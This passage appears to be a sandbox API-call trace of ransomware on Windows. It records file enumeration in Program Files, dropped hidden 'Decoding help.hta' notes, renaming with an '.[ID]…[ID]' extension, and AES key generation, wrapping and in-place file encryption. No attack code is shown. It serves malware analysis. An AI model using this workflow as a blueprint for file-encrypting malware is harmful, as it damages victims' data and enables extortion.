lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0041.035] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\renderingcontrol.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\renderingcontrol.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.083] FindNextFileW (in: hFindFile=0x5d8410, lpFindFileData=0xaa0fd30 | out: lpFindFileData=0xaa0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79e59891, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79e59891, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x555fa27c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x18db, dwReserved0=0x0, dwReserved1=0x0, cFileName="RenderingControl.xml", cAlternateFileName="")) returned 0 [0041.084] FindClose (in: hFindFile=0x5d8410 | out: hFindFile=0x5d8410) returned 1 Thread: id = 277 os_tid = 0x9dc [0040.895] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Network Sharing\\*.*", lpFindFileData=0xa50fd30 | out: lpFindFileData=0xa50fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8350 [0040.895] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.895] FindNextFileW (in: hFindFile=0x5d8350, lpFindFileData=0xa50fd30 | out: lpFindFileData=0xa50fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.352] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.352] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.352] FindNextFileW (in: hFindFile=0x5d8350, lpFindFileData=0xa50fd30 | out: lpFindFileData=0xa50fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0041.352] FindClose (in: hFindFile=0x5d8350 | out: hFindFile=0x5d8350) returned 1 Thread: id = 278 os_tid = 0x520 [0040.896] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Shared Gadgets\\*.*", lpFindFileData=0x13a5fd30 | out: lpFindFileData=0x13a5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8490 [0040.901] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.901] FindNextFileW (in: hFindFile=0x5d8490, lpFindFileData=0x13a5fd30 | out: lpFindFileData=0x13a5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.374] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.374] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.374] FindNextFileW (in: hFindFile=0x5d8490, lpFindFileData=0x13a5fd30 | out: lpFindFileData=0x13a5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0041.374] FindClose (in: hFindFile=0x5d8490 | out: hFindFile=0x5d8490) returned 1 Thread: id = 279 os_tid = 0x5b4 [0040.896] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\*.*", lpFindFileData=0x13b9fd30 | out: lpFindFileData=0x13b9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9b6c2483, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9b6c2483, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8390 [0040.896] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.896] FindNextFileW (in: hFindFile=0x5d8390, lpFindFileData=0x13b9fd30 | out: lpFindFileData=0x13b9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9b6c2483, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9b6c2483, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.359] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.359] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.359] FindNextFileW (in: hFindFile=0x5d8390, lpFindFileData=0x13b9fd30 | out: lpFindFileData=0x13b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3e98f1d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3e98f1d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3ebf07d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10689, dwReserved0=0x0, dwReserved1=0x0, cFileName="Revert.wmz", cAlternateFileName="")) returned 1 [0041.359] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\*.*" [0041.359] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\*.*") returned 57 [0041.359] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\Decoding help.hta" [0041.359] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\skins\\decoding help.hta")) returned 0xffffffff [0041.359] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\skins\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0041.372] WriteFile (in: hFile=0x368, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x13b9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x13b9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.373] CloseHandle (hObject=0x368) returned 1 [0041.373] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.374] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Revert.wmz") returned -1 [0041.374] lstrlenW (lpString="Revert.wmz") returned 10 [0041.374] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\*.*" [0041.374] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\*.*") returned 57 [0041.374] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\", lpString2="Revert.wmz" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\Revert.wmz") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\Revert.wmz" [0041.374] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\Revert.wmz" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\Revert.wmz") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\Revert.wmz" [0041.374] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\Revert.wmz", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\Revert.wmz.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\Revert.wmz.[ID]g9uZrLhJaygpwRm1[ID]" [0041.374] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\Revert.wmz" (normalized: "c:\\program files (x86)\\windows media player\\skins\\revert.wmz"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\Revert.wmz.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\skins\\revert.wmz.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.374] FindNextFileW (in: hFindFile=0x5d8390, lpFindFileData=0x13b9fd30 | out: lpFindFileData=0x13b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3e98f1d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3e98f1d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3ebf07d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10689, dwReserved0=0x0, dwReserved1=0x0, cFileName="Revert.wmz", cAlternateFileName="")) returned 0 [0041.374] FindClose (in: hFindFile=0x5d8390 | out: hFindFile=0x5d8390) returned 1 Thread: id = 280 os_tid = 0x4b0 [0040.897] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Visualizations\\*.*", lpFindFileData=0xab4fd30 | out: lpFindFileData=0xab4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d83d0 [0040.897] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.897] FindNextFileW (in: hFindFile=0x5d83d0, lpFindFileData=0xab4fd30 | out: lpFindFileData=0xab4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.371] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.372] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.372] FindNextFileW (in: hFindFile=0x5d83d0, lpFindFileData=0xab4fd30 | out: lpFindFileData=0xab4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0041.372] FindClose (in: hFindFile=0x5d83d0 | out: hFindFile=0x5d83d0) returned 1 Thread: id = 281 os_tid = 0x4c4 [0042.314] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*", lpFindFileData=0x778fd30 | out: lpFindFileData=0x778fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db4b8 [0042.318] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.318] FindNextFileW (in: hFindFile=0x5db4b8, lpFindFileData=0x778fd30 | out: lpFindFileData=0x778fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.318] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.318] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.318] FindNextFileW (in: hFindFile=0x5db4b8, lpFindFileData=0x778fd30 | out: lpFindFileData=0x778fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0ba500, ftCreationTime.dwHighDateTime=0x1c982ad, ftLastAccessTime.dwLowDateTime=0x6086b2d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4a0ba500, ftLastWriteTime.dwHighDateTime=0x1c982ad, nFileSizeHigh=0x0, nFileSizeLow=0x14e760, dwReserved0=0x0, dwReserved1=0x0, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0042.318] lstrcpyW (in: lpString1=0x10ba6450, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*" [0042.318] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*") returned 57 [0042.318] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Decoding help.hta" [0042.318] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\decoding help.hta")) returned 0xffffffff [0042.318] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0042.322] WriteFile (in: hFile=0x5b8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x778fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x778fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.323] CloseHandle (hObject=0x5b8) returned 1 [0042.324] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.324] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DBGHELP.DLL") returned 1 [0042.324] lstrlenW (lpString="DBGHELP.DLL") returned 11 [0042.324] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*" [0042.324] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*") returned 57 [0042.324] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", lpString2="DBGHELP.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" [0042.324] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" [0042.324] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0042.324] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.339] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5c0 [0042.339] CreateFileMappingA (hFile=0x5c0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5d4 [0042.339] CryptAcquireContextA (in: phProv=0x778fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x778fcec*=0x3448478) returned 1 [0042.340] CryptGenKey (in: hProv=0x3448478, Algid=0x6610, dwFlags=0x1, phKey=0x778fce8 | out: phKey=0x778fce8*=0x5db5f8) returned 1 [0042.340] CryptExportKey (in: hKey=0x5db5f8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x778fbe4, pdwDataLen=0x778fce4 | out: pbData=0x778fbe4*, pdwDataLen=0x778fce4*=0x2c) returned 1 [0042.340] MapViewOfFile (hFileMappingObject=0x5d4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x211e0000 [0042.349] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x778fbe4*, pdwDataLen=0x778fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x778fbe4*, pdwDataLen=0x778fcf8*=0x100) returned 1 [0042.350] CryptEncrypt (in: hKey=0x5db5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x211e0000, pdwDataLen=0x778fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x211e0000*, pdwDataLen=0x778fce4*=0x100000) returned 1 [0046.919] UnmapViewOfFile (lpBaseAddress=0x211e0000) returned 1 [0046.930] CloseHandle (hObject=0x5d4) returned 1 [0046.930] CryptDestroyKey (hKey=0x5db5f8) returned 1 [0046.930] CryptReleaseContext (hProv=0x3448478, dwFlags=0x0) returned 1 [0046.930] SetFilePointerEx (in: hFile=0x5c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.930] WriteFile (in: hFile=0x5c0, lpBuffer=0x778fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x778fcf8, lpOverlapped=0x0 | out: lpBuffer=0x778fbe4*, lpNumberOfBytesWritten=0x778fcf8*=0x100, lpOverlapped=0x0) returned 1 [0047.000] WriteFile (in: hFile=0x5c0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x778fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x778fcf8*=0x500, lpOverlapped=0x0) returned 1 [0047.000] CloseHandle (hObject=0x5c0) returned 1 [0049.768] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0051.170] FindNextFileW (in: hFindFile=0x5db4b8, lpFindFileData=0x778fd30 | out: lpFindFileData=0x778fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8f7000, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdb9ec040, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2f8f7000, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0xf2b88, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0051.170] lstrcpyW (in: lpString1=0x11173bc8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*" [0051.171] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*") returned 57 [0051.171] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Decoding help.hta" [0051.171] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\decoding help.hta")) returned 0x1 [0051.171] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DW20.EXE") returned -1 [0051.171] lstrlenW (lpString="DW20.EXE") returned 8 [0051.171] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*" [0051.171] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*") returned 57 [0051.171] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", lpString2="DW20.EXE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" [0051.171] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" [0051.171] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.[ID]g9uZrLhJaygpwRm1[ID]" [0051.171] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0056.461] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77c [0056.461] 